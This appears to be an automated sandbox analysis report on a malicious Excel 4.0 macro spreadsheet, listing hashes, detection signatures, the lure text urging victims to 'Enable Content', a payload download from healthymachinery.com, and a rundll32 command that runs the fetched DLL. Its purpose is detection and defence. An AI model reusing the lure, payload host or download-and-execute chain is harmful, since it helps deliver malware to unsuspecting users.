Loading ...

Play interactive tourEdit tour

Analysis Report Document1094680387_02012021.xls

Overview

General Information

Sample Name:Document1094680387_02012021.xls
Analysis ID:356299
MD5:9423ee9775707d51960e0eac95b3f6cc
SHA1:debc0defc997fde77a2f0cee9b3b1fcbed54ea91
SHA256:7034e21128da9ce58c2d5249d3fd73dd766cf90437fa52f79faa50098f359634

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 6408 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 6640 cmdline: rundll32 ..\MORI.BAST,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
Document1094680387_02012021.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0xaf0b:$e1: Enable Editing
  • 0xaf55:$e1: Enable Editing
  • 0xaf73:$e2: Enable Content
Document1094680387_02012021.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6408, ProcessCommandLine: rundll32 ..\MORI.BAST,DllRegisterServer, ProcessId: 6640

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    Compliance:

    barindex
    Uses new MSVCR DllsShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exeJump to behavior
    Source: global trafficDNS query: name: healthymachinery.com
    Source: global trafficTCP traffic: 192.168.2.3:49709 -> 104.21.29.200:80
    Source: global trafficTCP traffic: 192.168.2.3:49709 -> 104.21.29.200:80
    Source: global trafficHTTP traffic detected: GET /health/32-422-76.assp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: healthymachinery.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /health/32-422-76.assp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: healthymachinery.comConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: healthymachinery.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.aadrm.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.cortana.ai
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.office.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.onedrive.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://augloop.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cdn.entity.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://clients.config.office.net/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://config.edge.skype.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cortana.ai
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cortana.ai/api
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://cr.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dev.cortana.ai
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://devnull.onenote.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://directory.services.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://graph.windows.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://graph.windows.net/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://lifecycle.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://login.windows.local
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://management.azure.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://management.azure.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://messaging.office.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ncus-000.contentsync.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ncus-000.pagecontentsync.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://officeapps.live.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://onedrive.live.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://outlook.office.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://outlook.office365.com/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://powerlift.acompli.net
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://settings.outlook.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://staging.cortana.ai
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://store.office.com/?productgroup=Outlook
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://tasks.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://wus2-000.contentsync.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://wus2-000.pagecontentsync.
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 32-422-76[1].htm.0.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: ABB11F0C-CBA5-4B2D-A014-819D5AF7EBDA.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 12" from the yellow bar above 13 14" @Once You have Enable Editing, please cli
    Source: Screenshot number: 4Screenshot OCR: Enable Content 15 from the yellow bar above 16 17 "- WHY ICANNOT OPEN THIS DOCUMENT? 19 20 :)
    Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
    Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
    Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Document1094680387_02012021.xlsInitial sample: EXEC
    Source: Document1094680387_02012021.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
    Source: classification engineClassification label: mal68.expl.evad.winXLS@3/8@1/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{3FC8A149-37B1-4A83-BB2E-584C6B427583} - OProcSessId.datJump to behavior
    Source: Document1094680387_02012021.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\MORI.BAST,DllRegisterServerJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: Document1094680387_02012021.xlsInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
